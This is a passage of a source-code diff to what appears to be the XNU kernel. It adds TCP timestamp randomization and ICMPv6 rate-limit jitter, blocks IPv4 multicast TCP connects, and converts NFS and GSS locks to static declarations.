*/ - if ((error == EHOSTUNREACH || error == ENETDOWN) && + if ((error == EHOSTUNREACH || error == ENETDOWN || error == EADDRNOTAVAIL) && TCPS_HAVERCVDSYN(tp->t_state) && !inp_restricted_send(inp, inp->inp_last_outifp)) { tp->t_softerror = error; diff --git a/bsd/netinet/tcp_subr.c b/bsd/netinet/tcp_subr.c index fe3a0192a..0b2a55138 100644 --- a/bsd/netinet/tcp_subr.c +++ b/bsd/netinet/tcp_subr.c @@ -1032,6 +1032,7 @@ tcp_newtcpcb(struct inpcb *inp) struct tcpcb *tp; struct socket *so = inp->inp_socket; int isipv6 = (inp->inp_vflag & INP_IPV6) != 0; + uint32_t random_32; calculate_tcp_clock(); @@ -1104,14 +1105,19 @@ tcp_newtcpcb(struct inpcb *inp) tp->t_twentry.tqe_next = NULL; tp->t_twentry.tqe_prev = NULL; + read_frandom(&random_32, sizeof(random_32)); if (__probable(tcp_do_ack_compression)) { - read_frandom(&tp->t_comp_gencnt, sizeof(tp->t_comp_gencnt)); + tp->t_comp_gencnt = random_32; if (tp->t_comp_gencnt <= TCP_ACK_COMPRESSION_DUMMY) { tp->t_comp_gencnt = TCP_ACK_COMPRESSION_DUMMY + 1; } tp->t_comp_lastinc = tcp_now; } + if (__probable(tcp_randomize_timestamps)) { + tp->t_ts_offset = random_32; + } + /* * IPv4 TTL initialization is necessary for an IPv6 socket as well, * because the socket may be bound to an IPv6 wildcard address, diff --git a/bsd/netinet/tcp_timer.c b/bsd/netinet/tcp_timer.c index 5012199aa..2070bab17 100644 --- a/bsd/netinet/tcp_timer.c +++ b/bsd/netinet/tcp_timer.c @@ -1052,7 +1052,8 @@ retransmit_packet: (so->so_flags & SOF_MP_SUBFLOW)) { struct mptses *mpte = tptomptp(tp)->mpt_mpte; - if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) { + if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER || + mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) { mptcp_check_subflows_and_add(mpte); } } diff --git a/bsd/netinet/tcp_usrreq.c b/bsd/netinet/tcp_usrreq.c index fca0d56a6..861c9f71d 100644 --- a/bsd/netinet/tcp_usrreq.c +++ b/bsd/netinet/tcp_usrreq.c @@ -685,10 +685,18 @@ tcp6_usr_connect(struct socket *so, struct sockaddr *nam, struct proc *p) 
struct sockaddr_in sin; if ((inp->inp_flags & IN6P_IPV6_V6ONLY) != 0) { - return EINVAL; + error = EINVAL; + goto out; } in6_sin6_2_sin(&sin, sin6p); + /* + * Must disallow TCP ``connections'' to multicast addresses. + */ + if (IN_MULTICAST(ntohl(sin.sin_addr.s_addr))) { + error = EAFNOSUPPORT; + goto out; + } inp->inp_vflag |= INP_IPV4; inp->inp_vflag &= ~INP_IPV6; if ((error = tcp_connect(tp, (struct sockaddr *)&sin, p)) != 0) { diff --git a/bsd/netinet/tcp_var.h b/bsd/netinet/tcp_var.h index 3a93146ae..b332da095 100644 --- a/bsd/netinet/tcp_var.h +++ b/bsd/netinet/tcp_var.h @@ -69,6 +69,9 @@ #include #include #include +#if !KERNEL +#include +#endif #if defined(__LP64__) #define _TCPCB_PTR(x) u_int32_t @@ -642,6 +645,8 @@ struct tcpcb { uint32_t t_comp_lastinc; /* Last time the gen-count was changed - should change every TCP_COMP_CHANGE_RATE ms */ #define TCP_COMP_CHANGE_RATE 5 /* Intervals at which we change the gencnt. Means that worst-case we send one ACK every TCP_COMP_CHANGE_RATE ms */ + uint32_t t_ts_offset; /* Randomized timestamp offset to hide on-the-wire timestamp */ + uuid_t t_fsw_uuid; uuid_t t_flow_uuid; }; @@ -1227,7 +1232,7 @@ struct xtcpcb { u_quad_t xt_alignment_hack; }; -#if XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) +#if XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) struct xtcpcb64 { u_int32_t xt_len; @@ -1308,7 +1313,7 @@ struct xtcpcb64 { u_quad_t xt_alignment_hack; }; -#endif /* XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */ +#endif /* XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */ #ifdef PRIVATE @@ -1497,6 +1502,7 @@ extern uint32_t tcp_do_autorcvbuf; extern uint32_t tcp_autorcvbuf_max; extern int tcp_recv_bg; extern int tcp_do_ack_compression; +extern int tcp_randomize_timestamps; /* * Dummy value used for when there is no flow and we want to ensure that compression * can happen. 
diff --git a/bsd/netinet/udp_usrreq.c b/bsd/netinet/udp_usrreq.c index e789cb7bc..f8214f132 100644 --- a/bsd/netinet/udp_usrreq.c +++ b/bsd/netinet/udp_usrreq.c @@ -2346,12 +2346,8 @@ udp_disconnect(struct socket *so) struct inpcb *inp; inp = sotoinpcb(so); - if (inp == NULL -#if NECP - || (necp_socket_should_use_flow_divert(inp)) -#endif /* NECP */ - ) { - return inp == NULL ? EINVAL : EPROTOTYPE; + if (inp == NULL) { + return EINVAL; } if (inp->inp_faddr.s_addr == INADDR_ANY) { return ENOTCONN; diff --git a/bsd/netinet6/icmp6.c b/bsd/netinet6/icmp6.c index 08954c8ef..6e276598c 100644 --- a/bsd/netinet6/icmp6.c +++ b/bsd/netinet6/icmp6.c @@ -148,6 +148,7 @@ struct icmp6stat icmp6stat; extern struct inpcbhead ripcb; extern int icmp6errppslim; +extern int icmp6errppslim_random_incr; extern int icmp6rappslim; static int icmp6errpps_count = 0; static int icmp6rapps_count = 0; @@ -186,6 +187,11 @@ icmp6_init(struct ip6protosw *pp, struct domain *dp) if (!icmp6_initialized) { icmp6_initialized = 1; mld_init(); + if (icmp6errppslim >= 0 && + icmp6errppslim_random_incr > 0 && + icmp6errppslim <= INT32_MAX - (icmp6errppslim_random_incr + 1)) { + icmp6errppslim += (random() % icmp6errppslim_random_incr) + 1; + } } } @@ -3296,8 +3302,17 @@ icmp6_ratelimit( } } else if (!ppsratecheck(&icmp6errppslim_last, &icmp6errpps_count, icmp6errppslim)) { - /* The packet is subject to rate limit */ - ret++; + /* + * We add some randomness here to still generate ICMPv6 error + * post icmp6errppslim limit with a probability that goes down + * with increased value of icmp6errpps_count. 
+ */ + if (icmp6errpps_count > 0 && icmp6errppslim > 0 && + icmp6errpps_count > icmp6errppslim && + (random() % (icmp6errpps_count - icmp6errppslim)) != 0) { + /* The packet is subject to rate limit */ + ret++; + } } return ret; diff --git a/bsd/netinet6/in6_proto.c b/bsd/netinet6/in6_proto.c index 6ee55d379..f64ee80af 100644 --- a/bsd/netinet6/in6_proto.c +++ b/bsd/netinet6/in6_proto.c @@ -485,9 +485,11 @@ u_int32_t rip6_recvspace = RIPV6RCVQ; /* ICMPV6 parameters */ int icmp6_rediraccept = 1; /* accept and process redirects */ int icmp6_redirtimeout = 10 * 60; /* 10 minutes */ -int icmp6errppslim = 500; /* 500 packets per second */ +uint32_t icmp6errppslim = 500; /* 500 packets per second */ +uint32_t icmp6errppslim_random_incr = 500; /* We further randomize icmp6errppslim + * with this during icmpv6 initialization*/ int icmp6rappslim = 10; /* 10 packets per second */ -int icmp6_nodeinfo = 3; /* enable/disable NI response */ +int icmp6_nodeinfo = 0; /* enable/disable NI response */ /* UDP on IP6 parameters */ int udp6_sendspace = 9216; /* really max datagram size */ @@ -749,6 +751,8 @@ SYSCTL_INT(_net_inet6_icmp6, ICMPV6CTL_NODEINFO, nodeinfo, CTLFLAG_RW | CTLFLAG_LOCKED, &icmp6_nodeinfo, 0, ""); SYSCTL_INT(_net_inet6_icmp6, ICMPV6CTL_ERRPPSLIMIT, errppslimit, CTLFLAG_RW | CTLFLAG_LOCKED, &icmp6errppslim, 0, ""); +SYSCTL_INT(_net_inet6_icmp6, ICMPV6CTL_ERRPPSLIMIT_RANDOM_INCR, + errppslimit_random_incr, CTLFLAG_RW | CTLFLAG_LOCKED, &icmp6errppslim_random_incr, 0, ""); SYSCTL_INT(_net_inet6_icmp6, OID_AUTO, rappslimit, CTLFLAG_RW | CTLFLAG_LOCKED, &icmp6rappslim, 0, ""); SYSCTL_INT(_net_inet6_icmp6, ICMPV6CTL_ND6_DEBUG, diff --git a/bsd/nfs/gss/gss_krb5_mech.c b/bsd/nfs/gss/gss_krb5_mech.c index d0a36689a..91a87a8a8 100644 --- a/bsd/nfs/gss/gss_krb5_mech.c +++ b/bsd/nfs/gss/gss_krb5_mech.c @@ -71,7 +71,7 @@ #include #include "gss_krb5_mech.h" -lck_grp_t *gss_krb5_mech_grp; +LCK_GRP_DECLARE(gss_krb5_mech_grp, "gss_krb5_mech"); typedef struct crypt_walker_ctx { 
size_t length; @@ -198,7 +198,6 @@ gss_krb5_mech_init(void) } return; } - gss_krb5_mech_grp = lck_grp_alloc_init("gss_krb5_mech", LCK_GRP_ATTR_NULL); gss_krb5_mech_initted = GSS_KRB5_INITIALIZED; } @@ -578,12 +577,12 @@ krb5_mic(crypto_ctx_t ctx, gss_buffer_t header, gss_buffer_t bp, gss_buffer_t tr if (ikey) { if (!(ctx->flags & CRYPTO_KS_ALLOCED)) { - lck_mtx_lock(ctx->lock); + lck_mtx_lock(&ctx->lock); if (!(ctx->flags & CRYPTO_KS_ALLOCED)) { cc_key_schedule_create(ctx); } ctx->flags |= CRYPTO_KS_ALLOCED; - lck_mtx_unlock(ctx->lock); + lck_mtx_unlock(&ctx->lock); } key2use = ctx->ks.ikey[kdx]; } else { @@ -625,12 +624,12 @@ krb5_mic_mbuf(crypto_ctx_t ctx, gss_buffer_t header, if (ikey) { if (!(ctx->flags & CRYPTO_KS_ALLOCED)) { - lck_mtx_lock(ctx->lock); + lck_mtx_lock(&ctx->lock); if (!(ctx->flags & CRYPTO_KS_ALLOCED)) { cc_key_schedule_create(ctx); } ctx->flags |= CRYPTO_KS_ALLOCED; - lck_mtx_unlock(ctx->lock); + lck_mtx_unlock(&ctx->lock); } key2use = ctx->ks.ikey[kdx]; } else { @@ -679,12 +678,12 @@ krb5_crypt_mbuf(crypto_ctx_t ctx, mbuf_t *mbp, size_t len, int encrypt, cccbc_ct int error; if (!(ctx->flags & CRYPTO_KS_ALLOCED)) { - lck_mtx_lock(ctx->lock); + lck_mtx_lock(&ctx->lock); if (!(ctx->flags & CRYPTO_KS_ALLOCED)) { cc_key_schedule_create(ctx); } ctx->flags |= CRYPTO_KS_ALLOCED; - lck_mtx_unlock(ctx->lock); + lck_mtx_unlock(&ctx->lock); } if (!ks) { ks = encrypt ? 
ctx->ks.enc : ctx->ks.dec; @@ -989,6 +988,8 @@ cc_key_schedule_create(crypto_ctx_t ctx) void gss_crypto_ctx_free(crypto_ctx_t ctx) { + lck_mtx_destroy(&ctx->lock, &gss_krb5_mech_grp); + ctx->ks.ikey[GSS_SND] = NULL; if (ctx->ks.ikey[GSS_RCV] && ctx->key != ctx->ks.ikey[GSS_RCV]) { cc_clear(ctx->keylen, ctx->ks.ikey[GSS_RCV]); @@ -1074,7 +1075,7 @@ gss_crypto_ctx_init(struct crypto_ctx *ctx, lucid_context_t lucid) return ENOTSUP; } - ctx->lock = lck_mtx_alloc_init(gss_krb5_mech_grp, LCK_ATTR_NULL); + lck_mtx_init(&ctx->lock, &gss_krb5_mech_grp, LCK_ATTR_NULL); return 0; } diff --git a/bsd/nfs/gss/gss_krb5_mech.h b/bsd/nfs/gss/gss_krb5_mech.h index bf00a65a2..a41e778be 100644 --- a/bsd/nfs/gss/gss_krb5_mech.h +++ b/bsd/nfs/gss/gss_krb5_mech.h @@ -236,7 +236,7 @@ typedef struct crypto_ctx { uint32_t etype; uint32_t flags; size_t mpad; /* Message padding */ - lck_mtx_t *lock; + lck_mtx_t lock; lucid_context_t gss_ctx; /* Back pointer to lucid context */ void *key; /* Points to session key from lucid context */ const struct ccdigest_info *di; diff --git a/bsd/nfs/nfs.h b/bsd/nfs/nfs.h index a27fa20e5..53b2fd794 100644 --- a/bsd/nfs/nfs.h +++ b/bsd/nfs/nfs.h @@ -632,7 +632,7 @@ extern uint32_t nfsrv_user_stat_enabled; /* enable/disable active extern uint32_t nfsrv_user_stat_node_count; /* current count of user stat nodes */ extern uint32_t nfsrv_user_stat_max_idle_sec; /* idle seconds (node no longer considered active) */ extern uint32_t nfsrv_user_stat_max_nodes; /* active user list size limit */ -extern lck_grp_t *nfsrv_active_user_mutex_group; +extern lck_grp_t nfsrv_active_user_mutex_group; /* An active user node represented in the kernel */ struct nfs_user_stat_node { @@ -718,7 +718,7 @@ struct nfsrv_fmod { #define NFSRVFMODHASH(vp) (((uintptr_t) vp) & nfsrv_fmod_hash) extern LIST_HEAD(nfsrv_fmod_hashhead, nfsrv_fmod) * nfsrv_fmod_hashtbl; extern u_long nfsrv_fmod_hash; -extern lck_mtx_t *nfsrv_fmod_mutex; +extern lck_mtx_t nfsrv_fmod_mutex; extern int 
nfsrv_fmod_pending, nfsrv_fsevents_enabled; #endif @@ -988,7 +988,7 @@ struct nfsreq { */ TAILQ_HEAD(nfs_reqqhead, nfsreq); extern struct nfs_reqqhead nfs_reqq; -extern lck_grp_t *nfs_request_grp; +extern lck_grp_t nfs_request_grp; #define R_XID32(x) ((x) & 0xffffffff) @@ -1115,8 +1115,8 @@ extern TAILQ_HEAD(nfsrv_sockhead, nfsrv_sock) nfsrv_socklist, nfsrv_sockwg, nfsrv_sockwait, nfsrv_sockwork; /* lock groups for nfsrv_sock's */ -extern lck_grp_t *nfsrv_slp_rwlock_group; -extern lck_grp_t *nfsrv_slp_mutex_group; +extern lck_grp_t nfsrv_slp_rwlock_group; +extern lck_grp_t nfsrv_slp_mutex_group; /* * One of these structures is allocated for each nfsd. @@ -1169,15 +1169,15 @@ typedef int (*nfsrv_proc_t)(struct nfsrv_descript *, struct nfsrv_sock *, vfs_context_t, mbuf_t *); /* mutex for nfs server */ -extern lck_mtx_t *nfsd_mutex; +extern lck_mtx_t nfsd_mutex; extern int nfsd_thread_count, nfsd_thread_max; /* request list mutex */ -extern lck_mtx_t *nfs_request_mutex; +extern lck_mtx_t nfs_request_mutex; extern int nfs_request_timer_on; /* mutex for nfs client globals */ -extern lck_mtx_t *nfs_global_mutex; +extern lck_mtx_t nfs_global_mutex; #if CONFIG_NFS4 /* NFSv4 callback globals */ @@ -1206,7 +1206,6 @@ int vtonfsv2_mode(enum vtype, mode_t); void nfs_mbuf_init(void); -void nfs_nhinit(void); void nfs_nhinit_finish(void); u_long nfs_hash(u_char *, int); diff --git a/bsd/nfs/nfs4_subs.c b/bsd/nfs/nfs4_subs.c index 22627a247..9cc410b44 100644 --- a/bsd/nfs/nfs4_subs.c +++ b/bsd/nfs/nfs4_subs.c @@ -122,7 +122,7 @@ nfs4_init_clientid(struct nfsmount *nmp) static uint8_t en0addr[6]; static uint8_t en0addr_set = 0; - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); if (!en0addr_set) { ifnet_t interface = NULL; error = ifnet_find_by_name("en0", &interface); @@ -139,7 +139,7 @@ nfs4_init_clientid(struct nfsmount *nmp) ifnet_release(interface); } } - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); MALLOC(ncip, struct nfs_client_id 
*, sizeof(struct nfs_client_id), M_TEMP, M_WAITOK); if (!ncip) { @@ -185,7 +185,7 @@ nfs4_init_clientid(struct nfsmount *nmp) } /* make sure the ID is unique, and add it to the sorted list */ - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); TAILQ_FOREACH(ncip2, &nfsclientids, nci_link) { if (ncip->nci_idlen > ncip2->nci_idlen) { continue; @@ -220,7 +220,7 @@ nfs4_init_clientid(struct nfsmount *nmp) TAILQ_INSERT_TAIL(&nfsclientids, ncip, nci_link); } nmp->nm_longid = ncip; - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); return 0; } @@ -468,7 +468,12 @@ out: interval = 1; } lck_mtx_unlock(&nmp->nm_lock); - nfs_interval_timer_start(nmp->nm_renew_timer, interval * 1000); + + lck_mtx_lock(&nmp->nm_timer_lock); + if (nmp->nm_renew_timer) { + nfs_interval_timer_start(nmp->nm_renew_timer, interval * 1000); + } + lck_mtx_unlock(&nmp->nm_timer_lock); } /* diff --git a/bsd/nfs/nfs4_vnops.c b/bsd/nfs/nfs4_vnops.c index 4e1c7641f..7a5b838d5 100644 --- a/bsd/nfs/nfs4_vnops.c +++ b/bsd/nfs/nfs4_vnops.c @@ -2003,7 +2003,7 @@ tryagain: return NULL; } bzero(newnoop, sizeof(*newnoop)); - lck_mtx_init(&newnoop->noo_lock, nfs_open_grp, LCK_ATTR_NULL); + lck_mtx_init(&newnoop->noo_lock, &nfs_open_grp, LCK_ATTR_NULL); newnoop->noo_mount = nmp; kauth_cred_ref(cred); newnoop->noo_cred = cred; @@ -2039,7 +2039,7 @@ nfs_open_owner_destroy(struct nfs_open_owner *noop) if (noop->noo_cred) { kauth_cred_unref(&noop->noo_cred); } - lck_mtx_destroy(&noop->noo_lock, nfs_open_grp); + lck_mtx_destroy(&noop->noo_lock, &nfs_open_grp); FREE(noop, M_TEMP); } @@ -2228,7 +2228,7 @@ alloc: return ENOMEM; } bzero(newnofp, sizeof(*newnofp)); - lck_mtx_init(&newnofp->nof_lock, nfs_open_grp, LCK_ATTR_NULL); + lck_mtx_init(&newnofp->nof_lock, &nfs_open_grp, LCK_ATTR_NULL); newnofp->nof_owner = noop; nfs_open_owner_ref(noop); newnofp->nof_np = np; @@ -2272,7 +2272,7 @@ nfs_open_file_destroy(struct nfs_open_file *nofp) TAILQ_REMOVE(&nofp->nof_owner->noo_opens, nofp, 
nof_oolink); lck_mtx_unlock(&nofp->nof_owner->noo_lock); nfs_open_owner_rele(nofp->nof_owner); - lck_mtx_destroy(&nofp->nof_lock, nfs_open_grp); + lck_mtx_destroy(&nofp->nof_lock, &nfs_open_grp); FREE(nofp, M_TEMP); } @@ -3351,7 +3351,7 @@ tryagain: return NULL; } bzero(newnlop, sizeof(*newnlop)); - lck_mtx_init(&newnlop->nlo_lock, nfs_open_grp, LCK_ATTR_NULL); + lck_mtx_init(&newnlop->nlo_lock, &nfs_open_grp, LCK_ATTR_NULL); newnlop->nlo_pid = pid; newnlop->nlo_pid_start = p->p_start; newnlop->nlo_name = OSAddAtomic(1, &nfs_lock_owner_seqnum); @@ -3387,7 +3387,7 @@ nfs_lock_owner_destroy(struct nfs_lock_owner *nlop) nfs_open_owner_rele(nlop->nlo_open_owner); nlop->nlo_open_owner = NULL; } - lck_mtx_destroy(&nlop->nlo_lock, nfs_open_grp); + lck_mtx_destroy(&nlop->nlo_lock, &nfs_open_grp); FREE(nlop, M_TEMP); } @@ -4199,7 +4199,14 @@ restart: error = EIO; } if (!error) { + if (busy) { + nfs_open_state_clear_busy(np); + busy = 0; + } error = nmp->nm_funcs->nf_setlock_rpc(np, nofp, newnflp, 0, 0, vfs_context_thread(ctx), vfs_context_ucred(ctx)); + if (!busy && !nfs_open_state_set_busy(np, vfs_context_thread(ctx))) { + busy = 1; + } } if (!error || ((error != NFSERR_DENIED) && (error != NFSERR_GRACE))) { break; @@ -7479,13 +7486,13 @@ nfs4_vnop_rmdir( * again if another object gets created with the same filehandle * before this vnode gets reclaimed */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); if (np->n_hflag & NHHASHED) { LIST_REMOVE(np, n_hash); np->n_hflag &= ~NHHASHED; FSDBG(266, 0, np, np->n_flag, 0xb1eb1e); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); } FREE(dul, M_TEMP); return error; diff --git a/bsd/nfs/nfs_bio.c b/bsd/nfs/nfs_bio.c index b9c2b5ac1..54cd34dc2 100644 --- a/bsd/nfs/nfs_bio.c +++ b/bsd/nfs/nfs_bio.c @@ -117,10 +117,10 @@ int nfs_nbdwrite; int nfs_buf_timer_on = 0; thread_t nfsbufdelwrithd = NULL; -ZONE_DECLARE(nfsbuf_zone, "NFS bio", sizeof(struct nfsbuf), ZC_NONE); +static 
ZONE_DECLARE(nfsbuf_zone, "NFS bio", sizeof(struct nfsbuf), ZC_NONE); -lck_grp_t *nfs_buf_lck_grp; -lck_mtx_t *nfs_buf_mutex; +static LCK_GRP_DECLARE(nfs_buf_lck_grp, "nfs buf"); +LCK_MTX_DECLARE(nfs_buf_mutex, &nfs_buf_lck_grp); #define NFSBUF_FREE_PERIOD 30 /* seconds */ #define NFSBUF_LRU_STALE 120 @@ -215,9 +215,6 @@ nfs_buf_pgs_is_set(nfsbufpgs *nfsbp) void nfs_nbinit(void) { - nfs_buf_lck_grp = lck_grp_alloc_init("nfs_buf", LCK_GRP_ATTR_NULL); - nfs_buf_mutex = lck_mtx_alloc_init(nfs_buf_lck_grp, LCK_ATTR_NULL); - nfsbufcnt = nfsbufmetacnt = nfsbuffreecnt = nfsbuffreemetacnt = nfsbufdelwricnt = 0; nfsbufmin = 128; @@ -241,13 +238,13 @@ nfs_buf_timer(__unused void *param0, __unused void *param1) { nfs_buf_freeup(1); - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if (nfsbufcnt <= nfsbufmin) { nfs_buf_timer_on = 0; - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); return; } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_interval_timer_start(nfs_buf_timer_call, NFSBUF_FREE_PERIOD * 1000); @@ -266,7 +263,7 @@ nfs_buf_freeup(int timer) TAILQ_INIT(&nfsbuffreeup); - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); microuptime(&now); @@ -330,7 +327,7 @@ nfs_buf_freeup(int timer) FSDBG(320, nfsbufcnt, nfsbuffreecnt, nfsbuffreemetacnt, 0); NFSBUFCNTCHK(); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); while ((fbp = TAILQ_FIRST(&nfsbuffreeup))) { TAILQ_REMOVE(&nfsbuffreeup, fbp, nb_free); @@ -380,13 +377,13 @@ boolean_t nfs_buf_is_incore(nfsnode_t np, daddr64_t blkno) { boolean_t rv; - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if (nfs_buf_incore(np, blkno)) { rv = TRUE; } else { rv = FALSE; } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); return rv; } @@ -428,7 +425,7 @@ nfs_buf_page_inval(vnode_t vp, off_t offset) return ENXIO; } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); bp = nfs_buf_incore(VTONFS(vp), (daddr64_t)(offset / 
nmp->nm_biosize)); if (!bp) { goto out; @@ -461,7 +458,7 @@ nfs_buf_page_inval(vnode_t vp, off_t offset) } } out: - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); return error; } @@ -658,15 +655,15 @@ nfs_buf_delwri_service(void) TAILQ_INSERT_TAIL(&nfsbufdelwri, bp, nb_free); nfsbufdelwricnt++; nfs_buf_drop(bp); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_flushcommits(np, 1); } else { SET(bp->nb_flags, NB_ASYNC); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_buf_write(bp); } i++; - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); } } @@ -679,13 +676,13 @@ nfs_buf_delwri_thread(__unused void *arg, __unused wait_result_t wr) struct timespec ts = { .tv_sec = 30, .tv_nsec = 0 }; int error = 0; - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); while (!error) { nfs_buf_delwri_service(); - error = msleep(&nfsbufdelwrithd, nfs_buf_mutex, 0, "nfsbufdelwri", &ts); + error = msleep(&nfsbufdelwrithd, &nfs_buf_mutex, 0, "nfsbufdelwri", &ts); } nfsbufdelwrithd = NULL; - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); thread_terminate(nfsbufdelwrithd); } @@ -700,7 +697,7 @@ nfs_buf_delwri_push(int locked) return; } if (!locked) { - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); } /* wake up the delayed write service thread */ if (nfsbufdelwrithd) { @@ -713,7 +710,7 @@ nfs_buf_delwri_push(int locked) nfs_buf_delwri_service(); } if (!locked) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } } @@ -787,16 +784,16 @@ nfs_buf_get( } loop: - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); /* wait for any buffer invalidation/flushing to complete */ while (np->n_bflag & NBINVALINPROG) { np->n_bflag |= NBINVALWANT; ts.tv_sec = 2; ts.tv_nsec = 0; - msleep(&np->n_bflag, nfs_buf_mutex, slpflag, "nfs_buf_get_invalwait", &ts); + msleep(&np->n_bflag, &nfs_buf_mutex, slpflag, "nfs_buf_get_invalwait", &ts); if ((error = 
nfs_sigintr(VTONMP(vp), NULL, thd, 0))) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); FSDBG_BOT(541, np, blkno, 0, error); return error; } @@ -810,7 +807,7 @@ loop: /* if busy, set wanted and wait */ if (ISSET(bp->nb_lflags, NBL_BUSY)) { if (flags & NBLK_NOWAIT) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); FSDBG_BOT(541, np, blkno, bp, 0xbcbcbcbc); return 0; } @@ -819,7 +816,7 @@ loop: ts.tv_sec = 2; ts.tv_nsec = 0; - msleep(bp, nfs_buf_mutex, slpflag | (PRIBIO + 1) | PDROP, + msleep(bp, &nfs_buf_mutex, slpflag | (PRIBIO + 1) | PDROP, "nfsbufget", (slpflag == PCATCH) ? NULL : &ts); slpflag = 0; FSDBG_BOT(543, np, blkno, bp, bp->nb_flags); @@ -843,7 +840,7 @@ loop: } if (flags & NBLK_ONLYVALID) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); FSDBG_BOT(541, np, blkno, 0, 0x0000cace); return 0; } @@ -982,7 +979,7 @@ loop: nfs_buf_delwri_push(1); nfsneedbuffer = 1; - msleep(&nfsneedbuffer, nfs_buf_mutex, PCATCH | PDROP, "nfsbufget", NULL); + msleep(&nfsneedbuffer, &nfs_buf_mutex, PCATCH | PDROP, "nfsbufget", NULL); FSDBG_BOT(546, np, blkno, nfsbufcnt, nfsbufmax); if ((error = nfs_sigintr(VTONMP(vp), NULL, thd, 0))) { FSDBG_BOT(541, np, blkno, 0, error); @@ -1005,7 +1002,7 @@ loop: buffer_setup: /* unlock hash */ - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); switch (operation) { case NBLK_META: @@ -1026,7 +1023,7 @@ buffer_setup: if (!bp->nb_data) { /* Ack! couldn't allocate the data buffer! 
*/ /* clean up buffer and return error */ - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); LIST_REMOVE(bp, nb_vnbufs); bp->nb_vnbufs.le_next = NFSNOLIST; bp->nb_np = NULL; @@ -1037,7 +1034,7 @@ buffer_setup: } TAILQ_INSERT_HEAD(&nfsbuffree, bp, nb_free); nfsbuffreecnt++; - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); FSDBG_BOT(541, np, blkno, 0xb00, ENOMEM); return ENOMEM; } @@ -1067,7 +1064,7 @@ buffer_setup: /* unable to create upl */ /* vm object must no longer exist */ /* clean up buffer and return error */ - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); LIST_REMOVE(bp, nb_vnbufs); bp->nb_vnbufs.le_next = NFSNOLIST; bp->nb_np = NULL; @@ -1078,7 +1075,7 @@ buffer_setup: } TAILQ_INSERT_HEAD(&nfsbuffree, bp, nb_free); nfsbuffreecnt++; - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); FSDBG_BOT(541, np, blkno, 0x2bc, EIO); return EIO; } @@ -1190,7 +1187,7 @@ pagelist_cleanup_done: bp->nb_pagelist = NULL; } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); wakeup_needbuffer = wakeup_buffer = wakeup_nbdwrite = 0; @@ -1273,7 +1270,7 @@ pagelist_cleanup_done: FSDBG_BOT(548, bp, NBOFF(bp), bp->nb_flags, bp->nb_data); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); if (wakeup_needbuffer) { wakeup(&nfsneedbuffer); @@ -1298,13 +1295,13 @@ nfs_buf_iowait(struct nfsbuf *bp) { FSDBG_TOP(549, bp, NBOFF(bp), bp->nb_flags, bp->nb_error); - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); while (!ISSET(bp->nb_flags, NB_DONE)) { - msleep(bp, nfs_buf_mutex, PRIBIO + 1, "nfs_buf_iowait", NULL); + msleep(bp, &nfs_buf_mutex, PRIBIO + 1, "nfs_buf_iowait", NULL); } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); FSDBG_BOT(549, bp, NBOFF(bp), bp->nb_flags, bp->nb_error); @@ -1345,10 +1342,10 @@ nfs_buf_iodone(struct nfsbuf *bp) SET(bp->nb_flags, 